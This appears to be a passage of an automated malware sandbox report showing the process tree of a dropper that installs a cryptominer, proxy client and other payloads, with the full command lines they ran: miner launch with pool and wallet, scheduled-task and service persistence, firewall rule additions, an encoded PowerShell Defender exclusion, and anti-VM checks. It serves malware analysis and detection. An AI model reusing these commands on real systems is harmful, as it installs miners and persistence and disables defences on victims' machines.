PID 4988 wrote to memory of 1852	4988	4363463463464363463463463.exe	95
PID 1852 wrote to memory of 904	1852	csaff.exe	96
PID 1852 wrote to memory of 904	1852	csaff.exe	96
PID 904 wrote to memory of 3596	904	Update.exe	99
PID 904 wrote to memory of 3596	904	Update.exe	99
PID 904 wrote to memory of 3596	904	Update.exe	99
PID 904 wrote to memory of 4240	904	Update.exe	102
PID 904 wrote to memory of 4240	904	Update.exe	102
PID 904 wrote to memory of 4240	904	Update.exe	102
PID 3596 wrote to memory of 1860	3596	CoinSurf.WPF.exe	103
PID 3596 wrote to memory of 1860	3596	CoinSurf.WPF.exe	103
PID 3596 wrote to memory of 1860	3596	CoinSurf.WPF.exe	103
PID 3596 wrote to memory of 4336	3596	CoinSurf.WPF.exe	104
PID 3596 wrote to memory of 4336	3596	CoinSurf.WPF.exe	104
PID 4912 wrote to memory of 4104	4912	.exe	105
PID 4912 wrote to memory of 4104	4912	.exe	105
PID 4912 wrote to memory of 4104	4912	.exe	105
PID 4912 wrote to memory of 4104	4912	.exe	105
PID 4912 wrote to memory of 4104	4912	.exe	105
PID 4912 wrote to memory of 4104	4912	.exe	105
PID 4912 wrote to memory of 4104	4912	.exe	105
PID 4336 wrote to memory of 2060	4336	Update.exe	106
PID 4336 wrote to memory of 2060	4336	Update.exe	106
PID 4336 wrote to memory of 2060	4336	Update.exe	106
PID 2060 wrote to memory of 2128	2060	CoinSurf.WPF.exe	107
PID 2060 wrote to memory of 2128	2060	CoinSurf.WPF.exe	107
PID 2060 wrote to memory of 2128	2060	CoinSurf.WPF.exe	107
PID 4988 wrote to memory of 3044	4988	4363463463464363463463463.exe	109
PID 4988 wrote to memory of 3044	4988	4363463463464363463463463.exe	109

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3560	attrib.exe

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4988
- C:\Users\Admin\AppData\Local\Temp\Files\april.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\april.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1668
- - C:\Users\Admin\AppData\Local\Temp\is-GDCU1.tmp\april.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-GDCU1.tmp\april.tmp" /SL5="$E0212,7600454,54272,C:\Users\Admin\AppData\Local\Temp\Files\april.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:4868
  - - C:\Users\Admin\AppData\Local\MPV-EASY Player\mpveasyplayer.exe
      "C:\Users\Admin\AppData\Local\MPV-EASY Player\mpveasyplayer.exe" -i
      4⤵
      Executes dropped EXE
      PID:2764
  - - C:\Users\Admin\AppData\Local\MPV-EASY Player\mpveasyplayer.exe
      "C:\Users\Admin\AppData\Local\MPV-EASY Player\mpveasyplayer.exe" -s
      4⤵
      Executes dropped EXE
      PID:2412
- C:\Users\Admin\AppData\Local\Temp\Files\ma.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp6997.tmp.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2620
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:4832
  - - C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
      "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4912
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1904
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
        5⤵
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:4104
- C:\Users\Admin\AppData\Local\Temp\Files\socks5-clean.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\socks5-clean.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1952
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypass -File socks5-clean.ps1
    3⤵
    - Blocklisted process makes network request
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3132
- C:\Users\Admin\AppData\Local\Temp\Files\csaff.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\csaff.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1852
- - C:\Users\Admin\AppData\Local\SquirrelTemp\Update.exe
    "C:\Users\Admin\AppData\Local\SquirrelTemp\Update.exe" --install .
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:904
  - - C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\CoinSurf.WPF.exe
      "C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\CoinSurf.WPF.exe" --squirrel-firstrun
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Adds Run key to start application
      Modifies system certificate store
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:3596
    - - C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.7\CoinSurf.WPF.exe
        
        "C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.7\CoinSurf.WPF.exe" --squirrel-updated 1.0.7
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1860
    - - C:\Users\Admin\AppData\Local\CoinSurf\Update.exe
        
        "C:\Users\Admin\AppData\Local\CoinSurf\Update.exe" --processStartAndWait "CoinSurf.WPF.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4336
      - C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.7\CoinSurf.WPF.exe
        
        "C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.7\CoinSurf.WPF.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:2060
        
        C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.7\csen.exe
        
        "C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.7\csen.exe" -key=aecff056-524c-49f8-8479-68c6c99c331e -server=212.102.58.164:443 -dns=8.8.8.8:53 -ua=win32#6.2.9200.0#1.0.7-wpf -max_incoming_streams=1000000 -accept_backlog=100000 -ping_backlog=10000 -read_buffer_size=4096 -prod
        7⤵
        Executes dropped EXE
        
        PID:2128
  - - C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\csen.exe
      "C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\csen.exe" --squirrel-firstrun
      4⤵
      Executes dropped EXE
      PID:4240
- C:\Users\Admin\AppData\Local\Temp\Files\hncc.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\hncc.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3048
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwARgBpAGwAZQBzAFwAaABuAGMAYwAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAaABuAGMAYwAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAaABuAGMAYwAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAaABuAGMAYwAuAGUAeABlAA==
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2324
- - C:\Users\Admin\AppData\Local\Temp\Files\hncc.exe
    C:\Users\Admin\AppData\Local\Temp\Files\hncc.exe
    3⤵
    PID:3656
- - C:\Users\Admin\AppData\Local\Temp\Files\hncc.exe
    C:\Users\Admin\AppData\Local\Temp\Files\hncc.exe
    3⤵
    PID:4168
- C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3044
- - C:\Users\Admin\AppData\Local\Temp\BBLb.exe
    "C:\Users\Admin\AppData\Local\Temp\BBLb.exe"
    3⤵
    PID:5860
- - C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
    C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
    3⤵
    PID:3344
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3344 -s 484
      4⤵
      Program crash
      PID:5320
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3344 -s 496
      4⤵
      Program crash
      PID:6000
- C:\Users\Admin\AppData\Local\Temp\Files\cb0e88abe7aee128ff8635e44df9797d0224aff000d03fc5d9166e575b50f4a1.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\cb0e88abe7aee128ff8635e44df9797d0224aff000d03fc5d9166e575b50f4a1.exe"
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:1304
- C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:5020
- - C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe
    C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe
    3⤵
    PID:1896
- - C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe
    C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe
    3⤵
    PID:3708
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3708 -s 448
      4⤵
      Program crash
      PID:2256
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3708 -s 432
      4⤵
      Program crash
      PID:4560
- C:\Users\Admin\AppData\Local\Temp\Files\gate3_64.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\gate3_64.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Drops file in System32 directory
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Modifies registry class
  PID:4392
- - C:\Users\Admin\Documents\GuardFox\FSNYphJRvLB_VXg0vJsInz9P.exe
    "C:\Users\Admin\Documents\GuardFox\FSNYphJRvLB_VXg0vJsInz9P.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Executes dropped EXE
    - Identifies Wine through registry keys
    PID:5388
- - C:\Users\Admin\Documents\GuardFox\zYQ6hW3bnk5Dp2s5DhG1cOXh.exe
    "C:\Users\Admin\Documents\GuardFox\zYQ6hW3bnk5Dp2s5DhG1cOXh.exe"
    3⤵
    - Executes dropped EXE
    PID:5328
  - - C:\Users\Admin\AppData\Local\Temp\is-LBI9J.tmp\zYQ6hW3bnk5Dp2s5DhG1cOXh.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-LBI9J.tmp\zYQ6hW3bnk5Dp2s5DhG1cOXh.tmp" /SL5="$20302,7364862,54272,C:\Users\Admin\Documents\GuardFox\zYQ6hW3bnk5Dp2s5DhG1cOXh.exe"
      4⤵
      PID:3004
- - C:\Users\Admin\Documents\GuardFox\j3948XxyYzR9RquUXSxrEBKz.exe
    "C:\Users\Admin\Documents\GuardFox\j3948XxyYzR9RquUXSxrEBKz.exe"
    3⤵
    - Executes dropped EXE
    PID:5664
  - - C:\Windows\SysWOW64\control.exe
      "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\HcGE.cpl",
      4⤵
      PID:4652
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\HcGE.cpl",
        5⤵
        
        PID:5596
      - C:\Windows\system32\RunDll32.exe
        
        C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\HcGE.cpl",
        6⤵
        
        PID:4092
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\HcGE.cpl",
        7⤵
        
        PID:1560
- - C:\Users\Admin\Documents\GuardFox\qzGKrtt13iMr8gy3nfRk1fW6.exe
    "C:\Users\Admin\Documents\GuardFox\qzGKrtt13iMr8gy3nfRk1fW6.exe"
    3⤵
    - Executes dropped EXE
    PID:5400
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5400 -s 2664
      4⤵
      Program crash
      PID:5896
- - C:\Users\Admin\Documents\GuardFox\AMBZXl8CKqMuSCh42eIpHYa4.exe
    "C:\Users\Admin\Documents\GuardFox\AMBZXl8CKqMuSCh42eIpHYa4.exe"
    3⤵
    - Executes dropped EXE
    PID:6124
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\gparpnjy\
      4⤵
      PID:5804
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ileppyzz.exe" C:\Windows\SysWOW64\gparpnjy\
      4⤵
      PID:5564
  - - C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" create gparpnjy binPath= "C:\Windows\SysWOW64\gparpnjy\ileppyzz.exe /d\"C:\Users\Admin\Documents\GuardFox\AMBZXl8CKqMuSCh42eIpHYa4.exe\"" type= own start= auto DisplayName= "wifi support"
      4⤵
      Launches sc.exe
      PID:6028
  - - C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" description gparpnjy "wifi internet conection"
      4⤵
      Launches sc.exe
      PID:2716
  - - C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" start gparpnjy
      4⤵
      Launches sc.exe
      PID:1508
  - - C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
      4⤵
      Modifies Windows Firewall
      PID:5448
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6124 -s 1108
      4⤵
      Program crash
      PID:5984
- - C:\Users\Admin\Documents\GuardFox\COf9ITNCFe18e9mYwVRco9Y3.exe
    "C:\Users\Admin\Documents\GuardFox\COf9ITNCFe18e9mYwVRco9Y3.exe"
    3⤵
    - Executes dropped EXE
    PID:4972
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 476
      4⤵
      Program crash
      PID:5632
- - C:\Users\Admin\Documents\GuardFox\YJqDtomoOy9uxqtlxYh1Udx0.exe
    "C:\Users\Admin\Documents\GuardFox\YJqDtomoOy9uxqtlxYh1Udx0.exe"
    3⤵
    - Executes dropped EXE
    PID:3184
- - C:\Users\Admin\Documents\GuardFox\gjhxYDHWPrjkneptR3q2DXPX.exe
    "C:\Users\Admin\Documents\GuardFox\gjhxYDHWPrjkneptR3q2DXPX.exe"
    3⤵
    PID:4704
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im "gjhxYDHWPrjkneptR3q2DXPX.exe" /f & erase "C:\Users\Admin\Documents\GuardFox\gjhxYDHWPrjkneptR3q2DXPX.exe" & exit
      4⤵
      PID:5960
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "gjhxYDHWPrjkneptR3q2DXPX.exe" /f
        5⤵
        Kills process with taskkill
        
        PID:6116
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 1544
      4⤵
      Program crash
      PID:5824
- - C:\Users\Admin\Documents\GuardFox\kSkckQz6qwFzPdng20Dao465.exe
    "C:\Users\Admin\Documents\GuardFox\kSkckQz6qwFzPdng20Dao465.exe"
    3⤵
    PID:2316
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:4548
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:3440
- - C:\Users\Admin\Documents\GuardFox\aeSxugG3u9l3NXWhwDLYKkYM.exe
    "C:\Users\Admin\Documents\GuardFox\aeSxugG3u9l3NXWhwDLYKkYM.exe"
    3⤵
    PID:5124
- - C:\Users\Admin\Documents\GuardFox\vkAJSGTRKQL9fHB6HWODmmKo.exe
    "C:\Users\Admin\Documents\GuardFox\vkAJSGTRKQL9fHB6HWODmmKo.exe"
    3⤵
    PID:2436
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:1296
- - C:\Users\Admin\Documents\GuardFox\FaTH6wANbmmK1AJbDIQXMsq9.exe
    "C:\Users\Admin\Documents\GuardFox\FaTH6wANbmmK1AJbDIQXMsq9.exe"
    3⤵
    PID:5676
  - - C:\Users\Admin\Documents\GuardFox\4l30E5hiiY0nv9dJWTgnqSay.exe
      "C:\Users\Admin\Documents\GuardFox\4l30E5hiiY0nv9dJWTgnqSay.exe"
      4⤵
      PID:1508
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:6004
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2464
    - - C:\Users\Admin\Documents\GuardFox\4l30E5hiiY0nv9dJWTgnqSay.exe
        
        "C:\Users\Admin\Documents\GuardFox\4l30E5hiiY0nv9dJWTgnqSay.exe"
        5⤵
        
        PID:2516
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:576
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        6⤵
        
        PID:5912
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        7⤵
        Modifies Windows Firewall
        
        PID:5444
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:1540
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:4824
      - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        6⤵
        
        PID:2056
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        
        PID:2244
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        7⤵
        Creates scheduled task(s)
        
        PID:3432
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        
        PID:1996
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        7⤵
        
        PID:2580
- - C:\Users\Admin\Documents\GuardFox\QcDW0K8PeG8Zji2VJ_rzT_mo.exe
    "C:\Users\Admin\Documents\GuardFox\QcDW0K8PeG8Zji2VJ_rzT_mo.exe"
    3⤵
    PID:4480
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe"
      4⤵
      PID:5360
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff05909758,0x7fff05909768,0x7fff05909778
        5⤵
        
        PID:2364
- C:\Users\Admin\AppData\Local\Temp\Files\dvchost.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\dvchost.exe"
  2⤵
  - Executes dropped EXE
  PID:3284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
    3⤵
    PID:4452
  - - C:\Windows\system32\mode.com
      mode 65,10
      4⤵
      PID:2464
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e file.zip -p1979614625696244291525413362 -oextracted
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:5684
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e extracted/file_3.zip -oextracted
      4⤵
      PID:5128
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e extracted/file_2.zip -oextracted
      4⤵
      PID:4824
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e extracted/file_1.zip -oextracted
      4⤵
      PID:5672
  - - C:\Windows\system32\attrib.exe
      attrib +H "winhostDhcp.exe"
      4⤵
      Views/modifies file attributes
      PID:3560
  - - C:\Users\Admin\AppData\Local\Temp\main\winhostDhcp.exe
      "winhostDhcp.exe"
      4⤵
      PID:3436
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hpttpjhp\hpttpjhp.cmdline"
        5⤵
        
        PID:3432
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES229.tmp" "c:\Users\Admin\AppData\Local\CoinSurf\app-1.0.7\CSC1EA98389AB4248C6847631F3527E7.TMP"
        6⤵
        
        PID:4532
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lhqtvnti\lhqtvnti.cmdline"
        5⤵
        
        PID:5592
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES163D.tmp" "c:\Users\Admin\AppData\Roaming\CSC7D1C3F49D02848D6A45ACF514C44439E.TMP"
        6⤵
        
        PID:5656
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sxj3pw1v\sxj3pw1v.cmdline"
        5⤵
        
        PID:3952
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1376
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES21C7.tmp" "c:\Users\Admin\AppData\Local\ExtreamFanV5\CSC62652C626F594A25AB277E1587A3AF13.TMP"
        6⤵
        
        PID:3736
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ajk14g5i\ajk14g5i.cmdline"
        5⤵
        
        PID:4532
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES33B8.tmp" "c:\Windows\System32\CSCF1DA3671A66F440DA4ACE2C6133BF95.TMP"
        6⤵
        
        PID:2192
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\8a2tQJTIqV.bat"
        5⤵
        
        PID:5704
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
        
        PID:1552
      - C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        6⤵
        Runs ping.exe
        
        PID:5692
      - C:\Recovery\WindowsRE\bott.exe
        
        "C:\Recovery\WindowsRE\bott.exe"
        6⤵
        
        PID:908
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\xtlNdaBxkU.bat"
        7⤵
        
        PID:4472
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:2088
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        8⤵
        
        PID:5952
        
        C:\Recovery\WindowsRE\bott.exe
        
        "C:\Recovery\WindowsRE\bott.exe"
        8⤵
        
        PID:2436
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\OHqycByqx8.bat"
        9⤵
        
        PID:1760
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        10⤵
        
        PID:5980
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        10⤵
        Runs ping.exe
        
        PID:3588
        
        C:\Recovery\WindowsRE\bott.exe
        
        "C:\Recovery\WindowsRE\bott.exe"
        10⤵
        
        PID:6100
        
